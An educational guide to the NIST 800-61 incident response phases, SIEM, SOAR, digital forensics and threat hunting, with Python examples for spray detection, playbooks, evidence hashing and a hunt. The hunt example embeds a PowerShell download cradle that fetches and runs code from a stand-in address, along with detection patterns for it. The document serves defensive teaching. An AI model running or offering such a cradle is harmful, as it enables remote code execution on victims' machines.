Incident Response Lifecycle: NIST 800-61 Phases and Tools
Incident response is the structured approach to managing security breaches. NIST SP 800-61 defines four phases: Preparation; Detection and Analysis; Containment, Eradication, and Recovery; and Post-Incident Activity.
The NIST 800-61 Incident Response Lifecycle
NIST Special Publication 800-61 (Computer Security Incident Handling Guide) defines the standard framework for incident response. The four-phase lifecycle below comes from Revision 2 (2012), which is the version most certification exams test; Revision 3 (2025) keeps the same activities but reorganizes them around the CSF 2.0 functions. The four phases are:
Preparation — the most critical phase. Establish incident response policies, form the CSIRT (Computer Security Incident Response Team), acquire tools (forensics kits, imaging devices, analysis software), and conduct training and tabletop exercises.
Detection and Analysis — monitor systems for security events, validate whether an event is actually an incident, determine the scope (what systems are affected), assess the impact, and document everything. This is where SIEM tools play a crucial role.
Containment, Eradication, and Recovery — contain the incident to prevent further damage (short-term containment: isolate affected systems; long-term containment: apply temporary fixes), eradicate the root cause (remove malware, patch vulnerabilities, rebuild systems), and recover by restoring systems to normal operation.
Post-Incident Activity (Lessons Learned) — conduct a post-mortem meeting, document what happened and what was learned, update policies and procedures, and create a final incident report.
- Preparation: policies, team, tools, training — do this before any incident
- Detection & Analysis: identify, validate, scope the incident
- Containment/Eradication/Recovery: stop the damage, remove the threat, restore operations
- Post-Incident: lessons learned, documentation, process improvement
SIEM (Security Information and Event Management)
SIEM systems collect, aggregate, normalize, and analyze log data from across the enterprise to detect security incidents in near real time. SIEM combines two functions: Security Information Management (SIM, long-term log storage and reporting) and Security Event Management (SEM, real-time monitoring and alerting).
SIEM tools ingest logs from firewalls, servers, endpoints, applications, and network devices. They correlate events across multiple sources to identify patterns that no single log line reveals. For example, a SIEM might correlate a handful of failed logins against many different accounts from one source address, followed by a successful login from that same address. That pattern indicates password spraying: one common password tried across many accounts, which stays under per-account lockout thresholds and so never trips a simple failed-login rule.
- SIEM = SIM (log storage/reporting) + SEM (real-time monitoring)
- Ingests logs from firewalls, servers, endpoints, apps, network devices
- Correlation: links events across sources to detect attack patterns
- Alerting: triggers notifications based on rules and thresholds
- Common SIEMs: Splunk, ELK Stack, IBM QRadar, Microsoft Sentinel
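The password-spraying correlation described above, written out as a rule over constructed Windows-style logon events. This is an added example, not code from the page or from any SIEM product; the event tuple layout, the thresholds (five accounts, at most three failures each, ten-minute window) and the sample addresses are assumptions chosen to illustrate the logic.

```python
"""Password-spray correlation rule over constructed logon events.

Added example, not from the page or any SIEM vendor. The event layout,
field names and thresholds are assumptions made for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, account, source_ip, result).
# 4625 = failed logon, 4624 = successful logon (Windows Security log event IDs).
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", 4625, "alice", "203.0.113.7", "failure"),
    ("2024-05-01T09:00:03", 4625, "bob",   "203.0.113.7", "failure"),
    ("2024-05-01T09:00:05", 4625, "carol", "203.0.113.7", "failure"),
    ("2024-05-01T09:00:07", 4625, "dave",  "203.0.113.7", "failure"),
    ("2024-05-01T09:00:09", 4625, "erin",  "203.0.113.7", "failure"),
    ("2024-05-01T09:00:11", 4625, "frank", "203.0.113.7", "failure"),
    ("2024-05-01T09:01:30", 4624, "erin",  "203.0.113.7", "success"),
    # Benign noise: one user mistyping a password twice from the office LAN.
    ("2024-05-01T09:05:00", 4625, "grace", "10.0.0.12", "failure"),
    ("2024-05-01T09:05:04", 4625, "grace", "10.0.0.12", "failure"),
    ("2024-05-01T09:05:09", 4624, "grace", "10.0.0.12", "success"),
]

WINDOW = timedelta(minutes=10)  # correlation window (assumed)
MIN_ACCOUNTS = 5                # distinct accounts failing from one source
MAX_PER_ACCOUNT = 3             # spraying stays under lockout thresholds


def detect_password_spray(events):
    """Return one alert per source IP that failed against >= MIN_ACCOUNTS
    distinct accounts inside WINDOW with each account failing at most
    MAX_PER_ACCOUNT times (the spray signature). Any success from that
    source inside the same window is listed as a compromised account."""
    failures = defaultdict(list)   # src_ip -> [(time, account)]
    successes = defaultdict(list)  # src_ip -> [(time, account)]
    for ts, event_id, account, src, _result in sorted(events):
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            failures[src].append((t, account))
        elif event_id == 4624:
            successes[src].append((t, account))

    alerts = []
    for src, fails in failures.items():
        # Slide a window anchored at each failure; first window that matches wins.
        for start, _ in fails:
            per_account = defaultdict(int)
            for t, account in fails:
                if start <= t <= start + WINDOW:
                    per_account[account] += 1
            if (len(per_account) >= MIN_ACCOUNTS
                    and max(per_account.values()) <= MAX_PER_ACCOUNT):
                compromised = sorted(a for t, a in successes[src]
                                     if start <= t <= start + WINDOW)
                alerts.append({
                    "source_ip": src,
                    "accounts_targeted": len(per_account),
                    "window_start": start.isoformat(),
                    "compromised_accounts": compromised,
                    "severity": "critical" if compromised else "high",
                })
                break  # one alert per source; a SIEM would suppress duplicates
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The per-account ceiling is what separates spraying from brute force: a single account with fifty failures is a different rule. The office user who fails twice and then logs in never reaches five distinct accounts, so the noise produces no alert.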
SOAR (Security Orchestration, Automation, and Response)
SOAR platforms build on SIEM capabilities by automating incident response actions. SOAR can automatically: enrich alerts with threat intelligence, run playbooks (predefined response workflows), open tickets in ITSM systems, block indicators on firewalls, and quarantine endpoints.
While SIEM detects incidents, SOAR responds to them. SOAR reduces mean time to respond (MTTR) by automating repetitive enrichment and response tasks, allowing human analysts to focus on complex investigations. Playbooks that take disruptive actions (isolating a server, disabling an account, blocking an address shared by many users) normally include an analyst approval step, so that a false positive does not turn into a self-inflicted outage.
- SOAR automates response actions based on SIEM alerts
- Orchestration: connects security tools to work together
- Playbooks: predefined automated response workflows
- Reduces MTTR (Mean Time to Respond)
- SOAR is not a replacement for SIEM — it complements it
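A minimal playbook runner showing the enrich, decide, act sequence described above, including the approval gate for systems that must not be isolated automatically. This is an added example and not the page's code or any SOAR vendor's API; the threat-intel feed, the alert shape, the crown-jewel host list and the in-memory stand-ins for the firewall, EDR and ticketing integrations are all constructed for illustration.

```python
"""Toy SOAR playbook: enrich an alert, decide, act with guardrails.

Added example, not from the page or any product. THREAT_INTEL, CROWN_JEWELS,
the alert fields and the Environment stand-ins are assumptions.
"""
from dataclasses import dataclass, field

# Constructed threat-intel feed: indicator -> confidence and tags.
THREAT_INTEL = {
    "203.0.113.7": {"confidence": 90, "tags": ["password-spray", "tor-exit"]},
    "198.51.100.5": {"confidence": 40, "tags": ["scanner"]},
}

# Hosts whose isolation would cause an outage; never auto-quarantine these.
CROWN_JEWELS = {"dc01", "erp-db01"}

BLOCK_CONFIDENCE = 75  # assumed threshold for unattended firewall blocks


@dataclass
class Environment:
    """In-memory stand-ins for the tools a SOAR orchestrates."""
    firewall_blocklist: set = field(default_factory=set)
    quarantined_hosts: set = field(default_factory=set)
    tickets: list = field(default_factory=list)
    pending_approvals: list = field(default_factory=list)


def enrich(alert):
    """Attach threat-intel context for the alert's source indicator."""
    intel = THREAT_INTEL.get(alert["source_ip"], {"confidence": 0, "tags": []})
    return {**alert, "intel": intel}


def run_playbook(alert, env):
    """Enrich, decide, act. Returns the list of actions taken or queued."""
    alert = enrich(alert)
    actions = []
    # 1. Always open a ticket: the human record exists whatever automation does.
    env.tickets.append({"title": alert["rule"], "source_ip": alert["source_ip"],
                        "intel": alert["intel"]})
    actions.append("ticket_opened")
    # 2. Block the indicator only on high-confidence intel. A low-confidence
    #    block on a shared NAT address is an easy way to lock out real users.
    if alert["intel"]["confidence"] >= BLOCK_CONFIDENCE:
        env.firewall_blocklist.add(alert["source_ip"])
        actions.append(f"blocked {alert['source_ip']}")
    # 3. Quarantine affected endpoints, but route crown-jewel systems to an
    #    analyst for approval instead of acting on them unattended.
    for host in alert.get("affected_hosts", []):
        if host in CROWN_JEWELS:
            env.pending_approvals.append(("quarantine", host))
            actions.append(f"approval_required quarantine {host}")
        else:
            env.quarantined_hosts.add(host)
            actions.append(f"quarantined {host}")
    return actions


if __name__ == "__main__":
    env = Environment()
    print(run_playbook({"rule": "password_spray_success",
                        "source_ip": "203.0.113.7",
                        "affected_hosts": ["ws-erin", "dc01"]}, env))
```

The ordering matters: the ticket is created before any automated action, so an analyst reviewing a bad block or quarantine always has a record of why it happened.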
Digital Forensics and Chain of Custody
Digital forensics is the process of collecting, preserving, analyzing, and presenting digital evidence. The forensic process must maintain the integrity of evidence for potential legal proceedings.
Chain of Custody is the documented history of evidence — who collected it, when, where, how it was handled, and who had access. Every transfer must be documented. Break the chain and the evidence may be inadmissible in court.
Forensic principles: never work on the original data (always create a forensic image and analyze the copy), use write blockers so the acquisition itself cannot modify the evidence, document every action, and prove integrity through hashing: hash the original before imaging, hash the image after, record both values, and re-hash at every hand-off so that any change is detectable.
- Digital forensics: collect, preserve, analyze, present evidence
- Chain of custody: document every person who handles evidence
- Always work from a forensic image, never the original
- Hash verification (SHA-256) ensures evidence hasn't been tampered with
- Write blockers prevent accidental modification during acquisition
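The acquisition and custody procedure above, carried out on a small constructed "drive" file instead of a real device. This is an added example, not the page's code or any forensic tool's output: the chunked copy hashes the source as it is read and the image after it is written, the custody log chains each entry to the previous one so a deleted or edited line is detectable, and the `demo` function shows both a clean acquisition and a tampered image. The temp-file layout, custodian names and log fields are assumptions; opening the source read-only is a software stand-in for a hardware write blocker, not a substitute for one.

```python
"""Forensic image acquisition with hash verification and a chained custody log.

Added example, not from the page. Works on a constructed file under a temp
directory; the log format and names are assumptions for illustration.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1 << 20  # 1 MiB reads so a multi-GB image never sits in memory


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire_image(source, image_path):
    """Bit-for-bit copy of source into image_path. The source hash is taken
    from the bytes as they are read; the image hash is taken by re-reading the
    file from disk rather than trusting what we think we wrote."""
    src_hash = hashlib.sha256()
    fd = os.open(source, os.O_RDONLY)  # read-only: software stand-in for a write blocker
    with os.fdopen(fd, "rb") as src, open(image_path, "wb") as dst:
        for chunk in iter(lambda: src.read(CHUNK), b""):
            src_hash.update(chunk)
            dst.write(chunk)
    return src_hash.hexdigest(), sha256_file(image_path)


class CustodyLog:
    """Append-only record; each entry carries the hash of the previous entry,
    so removing or editing an entry breaks verify()."""

    def __init__(self):
        self.entries = []

    def record(self, action, custodian, evidence_hash):
        prev = self.entries[-1]["entry_hash"] if self.entries else "0" * 64
        entry = {"time": datetime.now(timezone.utc).isoformat(), "action": action,
                 "custodian": custodian, "evidence_hash": evidence_hash, "prev": prev}
        entry["entry_hash"] = hashlib.sha256(
            json.dumps(entry, sort_keys=True).encode()).hexdigest()
        self.entries.append(entry)
        return entry

    def verify(self):
        prev = "0" * 64
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "entry_hash"}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            if e["prev"] != prev or digest != e["entry_hash"]:
                return False
            prev = e["entry_hash"]
        return True


def demo(tamper=False):
    """Acquire a constructed drive, log custody, optionally tamper with the
    image. Returns (source_matches_image, image_unchanged_later, log_intact)."""
    with tempfile.TemporaryDirectory() as d:
        drive = os.path.join(d, "suspect_drive.bin")
        image = os.path.join(d, "evidence001.dd")
        with open(drive, "wb") as f:  # constructed "disk" contents
            f.write(b"MBR\x00" * 1024 + b"deleted_invoice.docx" + os.urandom(4096))
        src_hash, img_hash = acquire_image(drive, image)
        log = CustodyLog()
        log.record("acquired", "analyst1", img_hash)
        log.record("transferred to evidence locker", "analyst1", img_hash)
        if tamper:
            with open(image, "r+b") as f:  # someone edits one byte in storage
                f.seek(10)
                f.write(b"X")
        log.record("checked out for analysis", "analyst2", sha256_file(image))
        return src_hash == img_hash, sha256_file(image) == img_hash, log.verify()


if __name__ == "__main__":
    print("clean:", demo())
    print("tampered:", demo(tamper=True))
```

In the tampered run the custody log itself still verifies, because analyst2 honestly recorded the hash they observed; the break shows up as a mismatch between that hash and the acquisition hash, which is exactly the comparison made before any analysis begins.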
Threat Hunting
Threat hunting is the proactive search for threats that evaded existing security controls. Unlike incident response (which reacts to alerts), threat hunting assumes a breach has already occurred and actively looks for indicators.
The threat hunting process: (1) Create a hypothesis based on threat intelligence or known TTPs, (2) Collect and analyze data from logs, network traffic, and endpoints, (3) Investigate suspicious findings, (4) Respond if a threat is confirmed. The results improve detection rules and reduce future dwell time.
- Proactive — hunts for threats that evaded existing controls
- Hypothesis-driven: based on threat intelligence, TTPs, or anomalies
- Reduces dwell time (time between compromise and detection)
- Feeds back into detection rule improvements
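One hunt carried through the four steps above, as an added example that is not part of the original page. The hypothesis (macro-laden phishing attachments make an Office process spawn a script host, often with an encoded PowerShell command) is a common one; the Sysmon-style event fields, the sample events, the parent and child process lists and the indicator names are all constructed assumptions for illustration.

```python
"""Hypothesis-driven hunt over constructed process-creation events.

Added example, not from the page. Hypothesis: an Office application spawning
a script host, possibly with an encoded command, that signature rules missed.
Event layout, process lists and indicator names are assumptions.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# The payload a macro might hand to PowerShell; encoded the way -enc expects (UTF-16LE).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()

# Constructed sample events: (host, parent_image, image, command_line)
SAMPLE = [
    ("ws-17", "explorer.exe", "powershell.exe",
     "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("ws-42", "winword.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -enc " + _ENCODED),
    ("ws-09", "outlook.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("ws-42", "winword.exe", "splwow64.exe", "splwow64.exe 12288"),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_spawning_scripts(events):
    """Step 2 and 3 of the hunt: collect matching parent/child pairs, then
    pull out the indicators that turn a lead into something worth responding to."""
    findings = []
    for host, parent, image, cmdline in events:
        if parent.lower() not in OFFICE_PARENTS or image.lower() not in SCRIPT_HOSTS:
            continue
        indicators = []
        decoded = decode_encoded_command(cmdline)
        if decoded:
            indicators.append("encoded_command")
            if re.search(r"downloadstring|invoke-webrequest|\biex\b|invoke-expression",
                         decoded, re.I):
                indicators.append("download_cradle")
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
            indicators.append("hidden_window")
        findings.append({
            "host": host, "parent": parent, "image": image,
            "decoded": decoded, "indicators": indicators,
            # two or more indicators: escalate to incident response; else review
            "priority": "high" if len(indicators) >= 2 else "review",
        })
    return findings


if __name__ == "__main__":
    for f in hunt_office_spawning_scripts(SAMPLE):
        print(f["priority"], f["host"], f["parent"], "->", f["image"], f["indicators"])
```

The Outlook-to-cmd.exe finding with no indicators is the point of the "investigate" step: it may be a legitimate add-in, and the hunter decides. Once the hunt is done, the matching logic (Office parent, script-host child, encoded or hidden flags) becomes a standing SIEM rule, which is how hunting feeds back into detection and shortens dwell time next time.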
Exam Tip
Memorize the four NIST phases in order: Preparation → Detection & Analysis → Containment/Eradication/Recovery → Post-Incident. Know SIEM detects, SOAR responds. Chain of custody is critical for evidence admissibility.